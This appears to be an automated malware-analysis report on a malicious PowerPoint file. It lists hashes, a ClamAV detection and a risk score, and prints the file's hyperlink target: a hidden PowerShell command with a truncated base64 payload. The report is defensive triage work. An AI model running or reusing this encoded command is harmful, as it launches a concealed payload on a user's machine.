Office (OOXML) malware analysis — malicious · 4d6f3fb265e8d2b2

MALICIOUS

Office (OOXML)

31.1 KB Created: 2020-09-29 11:18:06 UTC Authoring application: Microsoft Office PowerPoint 16.0000 First seen: 2020-10-03

MD5: cc09904c4798badf08488ddedfa8079c SHA-1: f71c531ad8a221bf82a5359d9979957a5bf22667 SHA-256: 4d6f3fb265e8d2b2e373d7b2398059bafd572b9f927435ecf11399e03ef15fa8

68 Risk Score

Heuristics 2

ClamAV: Xml.Exploit.External_Relationship_Abuse-9987932-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xml.Exploit.External_Relationship_Abuse-9987932-1
External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS

Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQ

Open this report in the interactive analyzer, or submit your own file for analysis.